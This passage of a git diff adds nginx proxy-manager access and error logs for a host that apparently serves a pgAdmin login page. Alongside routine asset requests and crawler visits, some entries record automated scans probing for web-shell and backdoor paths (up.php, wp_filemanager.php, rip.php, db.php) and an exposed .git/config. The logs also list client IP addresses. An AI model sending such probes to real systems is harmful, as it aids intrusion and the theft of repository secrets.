Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - - 301 - GET http targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.182.116.62] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.182.116.62] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:03 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 34.182.116.62] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:04 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.182.116.62] [Length 5734] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:04 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.182.116.62] [Length 87470] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:04 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.182.116.62] [Length 150876] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:04 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.182.116.62] [Length 167356] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:05 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.182.116.62] [Length 313733] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:18:36:05 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.182.116.62] [Length 2321194] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[29/Jan/2026:20:16:35 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 66.132.153.137] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[29/Jan/2026:22:00:01 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 44.234.105.236] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[29/Jan/2026:22:00:01 +0000] - 404 404 - GET https targetts.ddns.net "/enhancecp" [Client 44.234.105.236] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)" "-" +[30/Jan/2026:07:05:18 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 74.7.244.20] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[30/Jan/2026:07:05:18 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 74.7.242.8] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[30/Jan/2026:07:05:18 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 74.7.242.8] [Length 2309] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://targetts.ddns.net/" +[30/Jan/2026:09:38:08 +0000] - 404 404 - GET https targetts.ddns.net "/robots.txt" [Client 138.246.253.24] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" "-" +[30/Jan/2026:20:10:07 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/plugins/fix/up.php" [Client 15.235.83.135] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "-" +[30/Jan/2026:20:10:08 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/plugins/fix/up.php" [Client 15.235.83.135] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "http://targetts.ddns.net/wp-content/plugins/fix/up.php" +[30/Jan/2026:20:14:54 +0000] - 404 404 - GET https targetts.ddns.net "/dup-installer/main.installer.php" [Client 15.235.83.135] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "-" +[30/Jan/2026:20:16:34 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/themes/seotheme/db.php?u" [Client 15.235.83.135] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36" "-" +[31/Jan/2026:12:15:34 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.20.201.240] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:15:34 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.20.201.240] [Length 2389] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[31/Jan/2026:12:15:34 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 3.20.201.240] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:15:35 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.20.201.240] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "http://targetts.ddns.net/" +[31/Jan/2026:12:15:35 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.20.201.240] [Length 2390] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[31/Jan/2026:12:31:13 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 3.151.194.164] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:31:13 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.151.194.164] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:12:31:13 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.151.194.164] [Length 2390] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[31/Jan/2026:12:31:13 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 3.151.194.164] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "http://targetts.ddns.net/" +[31/Jan/2026:12:31:14 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 3.151.194.164] [Length 2389] [Gzip -] [Sent-to 172.17.0.1] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "https://targetts.ddns.net/" +[31/Jan/2026:12:52:22 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 195.178.110.192] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[31/Jan/2026:12:52:23 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 195.178.110.192] [Length 6219] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[31/Jan/2026:12:52:23 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 195.178.110.192] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[31/Jan/2026:12:52:24 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 195.178.110.192] [Length 6219] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[31/Jan/2026:12:52:28 +0000] - - 301 - GET http targetts.ddns.net "/.git/config" [Client 195.178.110.192] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "-" +[31/Jan/2026:12:52:29 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 195.178.110.192] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[31/Jan/2026:12:52:29 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 195.178.110.192] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[31/Jan/2026:12:52:30 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 195.178.110.192] [Length 6219] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" "-" +[01/Feb/2026:01:57:17 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 13.74.146.113] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[01/Feb/2026:01:57:17 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 13.74.146.113] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[01/Feb/2026:01:57:17 +0000] - - 301 - GET http targetts.ddns.net "/rip.php" [Client 13.74.146.113] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[01/Feb/2026:01:57:17 +0000] - 404 404 - GET https targetts.ddns.net "/rip.php" [Client 13.74.146.113] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[01/Feb/2026:05:44:37 +0000] - - 301 - GET http targetts.ddns.net "/style.php" [Client 104.28.203.58] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[01/Feb/2026:11:27:10 +0000] - - 301 - GET http targetts.ddns.net "/style.php" [Client 104.28.235.59] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[01/Feb/2026:11:27:14 +0000] - 404 404 - GET https targetts.ddns.net "/style.php" [Client 104.28.235.59] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "Go-http-client/1.1" "http://targetts.ddns.net/style.php" +[01/Feb/2026:15:06:27 +0000] - 404 404 - GET https targetts.ddns.net "/.git/config" [Client 34.125.24.49] [Length 184] [Gzip 1.20] [Sent-to 172.17.0.1] "-" "-" +[01/Feb/2026:15:58:27 +0000] - - 301 - GET http targetts.ddns.net "/style.php" [Client 104.28.235.58] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Go-http-client/1.1" "-" +[02/Feb/2026:02:53:43 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 34.83.253.1] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:43 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 34.83.253.1] [Length 2310] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico?ver=91100" [Client 34.83.253.1] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/favicon.ico?ver=91100" [Client 34.83.253.1] [Length 78998] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 34.83.253.1] [Length 5734] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/vendor/require/require.min.js?ver=91100" [Client 34.83.253.1] [Length 6947] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/style.css?ver=91100" [Client 34.83.253.1] [Length 87470] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.react.js?ver=91100" [Client 34.83.253.1] [Length 150876] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 34.83.253.1] [Length 167356] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:44 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.main.js?ver=91100" [Client 34.83.253.1] [Length 313733] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:02:53:45 +0000] - 200 200 - GET https targetts.ddns.net "/static/js/generated/vendor.others.js?ver=91100" [Client 34.83.253.1] [Length 2321194] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Linux; Android 12; Pixel 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:15:06:58 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 64.23.128.152] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:15:06:58 +0000] - - 301 - GET http targetts.ddns.net "/favicon.ico" [Client 64.23.128.152] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "http://targetts.ddns.net/" +[02/Feb/2026:15:06:59 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 64.23.128.152] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[02/Feb/2026:15:07:03 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 64.23.128.152] [Length 2420] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "-" +[02/Feb/2026:15:07:04 +0000] - 302 302 - GET https targetts.ddns.net "/favicon.ico" [Client 64.23.128.152] [Length 245] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0" "https://targetts.ddns.net/login?next=/" diff --git a/proxy-manager/data/logs/proxy-host-3_access.log.1.gz b/proxy-manager/data/logs/proxy-host-3_access.log.1.gz new file mode 100755 index 0000000..fb20d36 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-3_access.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-3_access.log.2.gz b/proxy-manager/data/logs/proxy-host-3_access.log.2.gz new file mode 100755 index 0000000..116add9 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-3_access.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-3_access.log.3.gz b/proxy-manager/data/logs/proxy-host-3_access.log.3.gz new file mode 100755 index 0000000..c6daa4c Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-3_access.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-3_error.log b/proxy-manager/data/logs/proxy-host-3_error.log new file mode 100755 index 0000000..b52cc6c --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-3_error.log @@ -0,0 +1,71 @@ +2026/01/12 16:28:12 [warn] 226#226: *7660 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/97/0000002978 while reading upstream, client: 37.76.14.45, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/12 16:28:12 [warn] 227#227: *7661 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/97/0000002979 while reading upstream, client: 37.76.14.45, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/12 16:28:12 [warn] 227#227: *7662 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/98/0000002980 while reading upstream, client: 37.76.14.45, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/12 16:28:12 [warn] 226#226: *7659 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/98/0000002981 while reading upstream, client: 37.76.14.45, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/13 11:07:43 [warn] 255#255: *17494 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/45/0000007452 while reading upstream, client: 84.1.26.27, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/13 11:07:43 [warn] 254#254: *17504 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/45/0000007453 while reading upstream, client: 84.1.26.27, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/13 11:07:43 [warn] 254#254: *17503 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/45/0000007454 while reading upstream, client: 84.1.26.27, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/13 11:07:43 [warn] 257#257: *17501 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/45/0000007455 while reading upstream, client: 84.1.26.27, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/14 19:33:27 [warn] 293#293: *42659 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/35/0000019355 while reading upstream, client: 205.169.39.53, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/14 19:33:27 [warn] 292#292: *42662 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/35/0000019356 while reading upstream, client: 205.169.39.53, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/14 19:33:27 [warn] 293#293: *42661 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/35/0000019357 while reading upstream, client: 205.169.39.53, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/14 19:33:27 [warn] 292#292: *42654 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/35/0000019358 while reading upstream, client: 205.169.39.53, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net", referrer: "https://targetts.ddns.net/login?next=/" +2026/01/15 08:06:37 [warn] 306#306: *123634 using uninitialized "server" variable while logging request, client: 162.142.125.222, server: targetts.ddns.net, request: "GET / HTTP/1.1", host: "targetts.ddns.net:443" +2026/01/18 17:23:25 [warn] 408#408: *286886 using uninitialized "server" variable while logging request, client: 34.68.123.1, server: targetts.ddns.net +2026/01/19 02:11:29 [warn] 415#415: *296601 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/46/0000142461 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.react.js?ver=91100", host: "targetts.ddns.net" +2026/01/19 02:11:30 [warn] 417#417: *296606 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/46/0000142462 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.sqleditor.js?ver=91100", host: "targetts.ddns.net" +2026/01/19 02:11:30 [warn] 416#416: *296608 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/46/0000142463 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.main.js?ver=91100", host: "targetts.ddns.net" +2026/01/19 02:11:30 [warn] 414#414: *296610 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/46/0000142464 while reading upstream, client: 34.82.83.37, server: targetts.ddns.net, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.17.0.1:5050/static/js/generated/vendor.others.js?ver=91100", host: "targetts.ddns.net" +2026/01/20 